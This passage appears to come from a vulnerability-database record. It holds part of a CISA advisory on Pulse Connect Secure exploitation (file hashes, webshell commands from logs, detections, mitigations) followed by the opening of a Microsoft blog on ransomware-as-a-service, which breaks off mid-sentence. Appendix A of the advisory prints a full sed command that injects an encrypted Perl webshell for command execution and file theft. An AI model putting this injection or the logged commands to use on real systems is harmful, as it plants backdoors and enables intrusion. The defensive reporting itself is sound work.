suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. The modifications implemented a variety of webshell functionality:\n\n * `DSUpgrade.pm MD5`: `4d5b410e1756072a701dfd3722951907`\n * Runs arbitrary commands passed to it\n * Copies malicious code into `Licenseserverproto.cgi`\n * `Licenseserverproto.cgi MD5`: `9b526db005ee8075912ca6572d69a5d6`\n * Copies malicious logic to the new files during the patching process, allowing for persistence\n * `Secid_canceltoken.cgi MD5`: `f2beca612db26d771fe6ed7a87f48a5a`\n * Runs arbitrary commands passed via `HTTP` requests\n * `compcheckresult.cgi MD5`: `ca0175d86049fa7c796ea06b413857a3`\n * Publicly-facing page to send arbitrary commands with `ID` argument\n * `Login.cgi MD5`: `56e2a1566c7989612320f4ef1669e7d5`\n * Allows for credential harvesting of authenticated users\n * `Healthcheck.cgi MD5:` `8c291ad2d50f3845788bc11b2f603b4a`\n * Runs arbitrary commands passed via `HTTP` requests\n\nMany of the threat actor\u2019s early actions are logged in the Unauthenticated Requests Log as seen in the following format, URIs have been redacted to minimize access to webshells that may still be active:\n\n`Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX.`\n\nThe threat actor then ran the commands listed in table 1 via the webshell.\n\n_Table 1: Commands run via webshell_\n\n**Time ** | **Command ** \n---|--- \n2021-01-19T07:46:05.000+0000 | `pwd` \n2021-01-19T07:46:24.000+0000 | `cat%20/home/webserver/htdocs/dana-na/[redacted]` \n2021-01-19T08:10:13.000+0000 | `cat%20/home/webserver/htdocs/dana-na/l[redacted]` \n2021-01-19T08:14:18.000+0000 | See Appendix. \n2021-01-19T08:15:11.000+0000 | `cat%20/home/webserver/htdocs/dana-na/[redacted]` \n2021-01-19T08:15:49.000+0000 | `cat%20/home/webserver/htdocs/dana-na/[redacted]` \n2021-01-19T09:03:05.000+0000 | `cat%20/home/webserver/htdocs/dana-na/[redacted]` \n2021-01-19T09:04:47.000+0000 | `$mount` \n2021-01-19T09:05:13.000+0000 | `/bin/mount%20-o%20remount,rw%20/dev/root%20/` \n2021-01-19T09:07:10.000+0000 | `$mount` \n \nThe cyber threat actor is using exploited devices located on residential IP space\u2014including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors\u2014to proxy their connection to interact with the webshells they placed on these devices. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity. Note: these devices are not related to the Pulse vulnerabilities, but rather, where the malicious internet traffic passes through.\n\nDetails about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available.\n\n### (Updated April 30, 2021): Detections\n\n#### _(Updated April 30, 2021): Impossible Travel_\n\nDuring the course of analysis, it is possible that a network defender may be able to reveal illegitimate connections from users that are masquerading as legitimate users from different geolocations. CISA has noted IPs associated with malicious webshell interaction from a threat actor\u2014associated with a single username\u2014in both the authenticated and the unauthenticated logs at the same time. The geo-location for the two IP addresses was sufficiently far that impossible travel calculations could detect the threat actor IP address.\n\n#### _(Updated April 30, 2021): TLS Fingerprinting_\n\nTransport Layer Security (TLS) fingerprinting may also be useful in identifying malicious activity. CISA has noted re-use of various JA3 hashes including JA3 hashes that align with Chrome, Firefox, and others. Caution should be taken when using TLS fingerprinting because the majority of the JA3 hashes observed in connection with Pulse Connect Secure exploitation were not unique to malicious activity. The same JA3 hashes\u2014and the software they characterize\u2014are often used for benign activity, vulnerability scanning, etc. Overlap in JA3 hashes cannot be considered a high-fidelity indicator of malicious activity, let alone successful exploitation. Connections made via JA3 must be corroborated with other data points.\n\n * A common observation is that the TLS connections frequently exclude the Server Name Indication (SNI) extension, which is relatively rare in most environments where users connect to Domain Name Server (DNS) host names (but is commonly observed in scanning). It is believed this is an artifact of attackers browsing direct to IP addresses instead of host names.\n * The JA3 hashes in table 2 below have been observed in connection with a pulse secure exploitation. **Note:** there may be many User-Agents associated with a given JA3 (often due to User-Agent spoofing) and the prevalence of a given JA3 necessarily differs by environment. The prevalence column of table 2 refers to how often the specific JA3 hash was observed in the dataset that was being analyzed. Some hashes are rarely observed in the dataset and the information is provided for context only. Analytical conclusions should not be made solely based on this reporting. The prevalence of a JA3 hash observed in an environment would need to be further evaluated.\n\n_Table 2: JA3 MD5 hashes and associated prevalence/user-agent_\n\nJA3 Hash | User-Agent | Prevalence \n---|---|--- \n \n227ab2ae6ed6abcc249e8a873a033144\n\n| Firefox (~68-71) | very rare \n \n30017f6f809155387cbcf95be6e7225d\n\n| (UA header frequently not set) | rare \n \n3cbc88eabdac9af71445f9040a6cf46c\n\n| Chrome (~50-57) | very rare \n \n53829d58e2631a372bb4de1be2cbecca\n\n| Chrome (~51-81) | rare \n \n714cdf6e462870e2b85d251a3b22064b\n\n| Firefox (~65-68) | very rare \n \n86cb13d6bbb3ac96b78b408bcfc18794\n\n| Python-requests, many others | common (but rare when used with pulse secure) \n \n8f6747b71d1003df1b7e3e8232b1a7e3\n\n| Chrome (~89) | rare \n \n916e458922ae9a1bab6b1154689c7de7\n\n| Firefox (~60-86) | very rare \n \na29d0d294a6236b5bf0ec2573dd4f02f\n\n| Firefox (~77-87), Chrome (~78-90), others | very rare \n \naf26ba5e85475b634275141e6ed3dc54\n\n| Python-requests, many others | rare \n \nb592adaa596bb72a5c1ccdbecae52e3f\n\n| Chrome (~79-90) | rare \n \nc12f54a3f91dc7bafd92cb59fe009a35\n\n| Office, many others | very rare \n \n### Mitigations\n\n**(_Updated May 3, 2021_)** CISA strongly urges organizations using Pulse Secure devices to immediately:\n\n * Review the [Pulse Secure Connect Integrity Tool Quick Start Guide](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) and [Customer FAQs](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44764>)\n * Run the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>). \n * The tool requires a reboot.\n * If virtualized, take a snapshot before running.\n * If the appliance is physical, consider the consequences of rebooting and running the tool and contact Ivanti for assistance or questions.\n * **(_Updated May 3, 2021_)** ~~Continue to run the tool daily until the XML mitigations have been implemented or the patch has been deployed.~~ **Note:** the Pulse Secure team released [Security Advisory SA44784](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>) that addresses [CVE-2021-22893](<https://vulners.com/cve/CVE-2021-22893>), CVE-2021-22984, CVE-2021-22899, and CVE-2021-22900 with patches.\n * ~~Implement the mitigations released by the vendor. According Ivanti Pulse Secure, the interim XML configurations listed in the \"Workaround\" section of [SA44784 - 2021-04: Out-of-Cycle Advisory: Pulse Connect Secure RCE Vulnerability (CVE-2021-22893)](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/SA44784/s>) provide significant protection against threat actor activity.~~\n * **(_Updated May 3, 2021_)** Update to the latest software version.~~, per the process outlined on Ivanti Pulse Secure\u2019s website which contains security enhancements.~~\n * _**(Updated May 27, 2021)**_ Using the Pulse Secure Integrity Checker. The Integrity Checker Tool (ICT) helps system owners understand if their Pulse Secure Connect device has been compromised. While the tool is accurate, there are several nuances to its effective use. \n * The ICT detects evidence of adversary cleanup only on the current, running version of PCS.\n * It may be necessary to roll back the current PCS version to have a valid run of the ICT.\n * During the upgrade process, the active version becomes a rollback partition.\n * Only one rollback partition exists on a device, as the rollback partition is replaced on each update.\n * Therefore, if an entity has updated their PCS device without running the correct version of the ICT (as outlined in Appendix B), anomalous activity will not be detected. \n\n\nIf the Integrity Checker Tools finds mismatched or unauthorized files, CISA urges organizations to:\n\n * Contact CISA to report your findings (see Contact Information section below).\n * Contact [Ivanti Pulse Secure](<https://support.pulsesecure.net/support/support-contacts/>) for assistance in capturing forensic information.\n * Review \u201cUnauthenticated Web Requests\u201d log for evidence of exploitation, if enabled.\n * Change all passwords associated with accounts passing through the Pulse Secure environment (including user accounts, service accounts, administrative accounts and any accounts that could be modified by any account described above, all of these accounts should be assumed to be compromised). **Note: **Unless an exhaustive password reset occurs, factory resetting a Pulse Connect Secure appliance (see Step 3 below) will only remove malicious code from the device, and may not remove the threat actor from the environment. The threat actor may use the credentials harvested to regain access even after the appliance is fully patched.\n * Review logs for any unauthorized authentications originating from the Pulse Connect Secure appliance IP address or the DHCP lease range of the Pulse Connect Secure appliance's VPN lease pool.\n * _**(Updated May 27, 2021)** _**Note: **adversary activity may not be easily identifiable on your network as it may appear as a normal user traffic. If a device has been compromised, entities should take all precautions as if the adversary has intruded past the device into your network and take steps to ensure there are no further signs of an intrusion into networks that include: \n * Look for unauthorized applications and scheduled tasks in environments. \n * Ensure no new administrators were created.\n * Ensure non-privileged users were not added to privileged groups.\n * Scrutinize and monitor all accounts with domain administrator privileges. \n * Monitor domain administrator accounts to ensure they are only accessing the part of the network they are authorized to access. \n * Check all accounts should be checked to ensure they have the proper level of privileges and have not been altered such as increased privileges. \n * Remove any remote access programs not approved by the organization.\n * Carefully inspect scheduled tasks for scripts or executables that may allow a threat actor to connect to an environment.\n\nIn addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files, should consider the guidance in [KB44764 - Customer FAQ: PCS Security Integrity Tool Enhancements](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44764>), which includes:\n\nAfter preservation, you can remediate your Pulse Connect Secure appliance by: \n\n 1. Disabling the external-facing interface. \n 2. Saving the system and user config.\n 3. Performing a factory reset via the Serial Console. **Note: **For more information refer to [KB22964](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB22964/?kA1j0000000FjFj>) (How to reset a PCS device to the factory default setting via the serial console)\n 4. Updating the appliance to the newest version.\n 5. Re-importing the saved config. \n 6. Re-enabling the external interface. \n\nCISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) again after remediation has been taken place.\n\nCISA would like to thank Ivanti for their contributions to this Alert.\n\n### Contact Information\n\nCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at\n\n * 1-888-282-0870 (From outside the United States: +1-703-235-8832)\n * [central@cisa.dhs.gov ](<mailto:Central@cisa.dhs.gov>)(UNCLASS)\n * us-cert@dhs.sgov.gov (SIPRNET)\n * us-cert@dhs.ic.gov (JWICS)\n\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at <http://www.us-cert.cisa.gov/>.\n\n### Appendix A: Large sed Command Found In Unauthenticated Logs\n\n`Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20%22/main();/cuse%20MIME::Base64;use%20Crypt::RC4;my%20[redacted];sub%20r{my%20\\$n=\\$_[0];my%20\\$rs;for%20(my%20\\$i=0;\\$i%3C\\$n;\\$i++){my%20\\$n1=int(rand(256));\\$rs.=chr(\\$n1);}return%20\\$rs;}sub%20a{my%20\\$st=\\$_[0];my%20\\$k=r([redacted]);my%20\\$en%20=%20RC4(%20\\$k.\\$ph,%20\\$st);return%20encode_base64(\\$k.\\$en);}sub%20b{my%20\\$s=%20decode_base64(\\$_[0]);%20my%20\\$l=length(\\$s);my%20\\$k=%20substr(\\$s,0,[redacted]);my%20\\$en=substr(\\$s,[redacted],\\$l-[redacted]);my%20\\$de%20=%20RC4(%20\\$k.\\$ph,%20\\$en%20);return%20\\$de;}sub%20c{my%20\\$fi=CGI::param(%27img%27);my%20\\$FN=b(\\$fi);my%20\\$fd;print%20\\%22Content-type:%20application/x-download\\\\n\\%22;open(*FILE,%20\\%22%3C\\$FN\\%22%20);while(%3CFILE%3E){\\$fd=\\$fd.\\$_;}close(*FILE);print%20\\%22Content-Disposition:%20attachment;%20filename=tmp\\\\n\\\\n\\%22;print%20a(\\$fd);}sub%20d{print%20\\%22Cache-Control:%20no-cache\\\\n\\%22;print%20\\%22Content-type:%20text/html\\\\n\\\\n\\%22;my%20\\$fi%20=%20CGI::param(%27cert%27);\\$fi=b(\\$fi);my%20\\$pa=CGI::param(%27md5%27);\\$pa=b(\\$pa);open%20(*outfile,%20\\%22%3E\\$pa\\%22);print%20outfile%20\\$fi;close%20(*outfile);}sub%20e{print%20\\%22Cache-Control:%20no-cache\\\\n\\%22;print%20\\%22Content-type:%20image/gif\\\\n\\\\n\\%22;my%20\\$na=CGI::param(%27name%27);\\$na=b(\\$na);my%20\\$rt;if%20(!\\$na%20or%20\\$na%20eq%20\\%22cd\\%22)%20{\\$rt=\\%22Error%20404\\%22;}else%20{my%20\\$ot=\\%22/tmp/1\\%22;system(\\%22\\$na%20%3E/tmp/1%202%3E&1\\%22);open(*cmd_result,\\%22%3C\\$ot\\%22);while(%3Ccmd_result%3E){\\$rt=\\$rt.\\$_;}close(*cmd_result);unlink%20\\$ot}%20%20print%20a(\\$rt);}sub%20f{if(CGI::param(%27cert%27)){d();}elsif(CGI::param(%27img%27)%20and%20CGI::param(%27name%27)){c();}elsif(CGI::param(%27name%27)%20and%20CGI::param(%27img%27)%20eq%20\\%22\\%22){e();}else{%20%20%20&main();}}if%20(\\$ENV{%27REQUEST_METHOD%27}%20eq%20\\%22POST\\%22){%20%20f();}else{&main();%20}%22%20/home/webserver/htdocs/dana-na/[redacted] came from IP XX.XX.XX.XX`\n\n### Appendix B: ICT Releases\n\n_Table 3: ICT Releases \u2013 releases are cumulative_\n\n**Release Package ** | **Supported Versions (n+1 always supports nth versions)** | Release Date \n---|---|--- \npackage-integrity-checker-11951.1.pkg | \n\n * 8.3R7.1 (build 65025)\n * 9.1R7 (build 6567)\n * 9.1R8 (build 7453)\n * 9.1R8.1 (build 7851)\n * 9.1R8.2 (build 8511)\n * 9.1R9 (build 9189)\n * 9.1R9.1 (build 9701)\n * 9.1R10 (build 10119)\n * 9.1R11 (build 11161)\n * 9.1R11.1 (build 11915)\n| 3/31/2021 (ICTv1 released to public on 3/31/2021) *Initial build \npackage-integrity-checker-12255.1.pkg | \n\n * 9.1R8.4 (build 12177)\n * 9.1R9.2 (build 12181)\n * 9.1R10.2 (build 12179)\n * 9.1R11.3 (build 12173)\n * 9.1R1(build 1505)\n * 9.1R2 (build 2331) \n * 9.1R3 (build 3535)\n * 9.1R4 (build 4763)\n * 9.1R4.1 (build 4967)\n * 9.1R4.2 (build 5035)\n * 9.1R4.3 (build 5185)\n * 9.1R5 (build 5459)\n * 9.1R6 (build 5801)\n| 4/17/2021 (ICTv2 released to public on 4/18/2021) \npackage-integrity-checker-12363.1.pkg | \n\n * 9.1R11.3:HF1(build 12235)\n * 9.1R9.1HF1 (build 10625.1)\n * 9.1R11.1HF1(build 12049.1)\n * 9.1R11.4 (build 12319)\n| 5/3/2021 (ICTv3 released to public on 5/3/2021) \n \n### References\n\n[FireEye blog: Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>)\n\n[CERT/CC Vulnerability Note VU#213092 Pulse Connect Secure vulnerable to authentication bypass](<https://www.kb.cert.org/vuls/id/213092>)\n\n### Revisions\n\nApril 20, 2021: Initial version|April 21, 2021: Added CERT/CC Vulnerability Note to References|April 26, 2021: Added IOC STIX File|April 30, 2021: Replaced IOC STIX File; Added new Detection Section|May 3, 2021: Added Ivanti Security Update Information|May 27, 2021: Added additional technical details and Appendix B|July 21, 2021: Added update note directing reader to review new Malware Analysis Reports|August 3, 2021: Added bulleted list of July 21 MARs|August 11, 2021: Added Ivanti Security Update Information|August 24, 2021: Added new Malware Analysis Reports\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-24T12:00:00", "type": "ics", "title": "Exploitation of Pulse Connect Secure Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22984", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-08-24T12:00:00", "id": "AA21-110A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-110a", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-05-09T15:51:15", "description": "Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for example, a security product that isn\u2018t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. \n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as specifically attacking the target\u2019s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. \n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attackers is DEV-0537 (also known as LAPSUS$), which is profiled below. \n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privilege access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access to a hands-on keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to 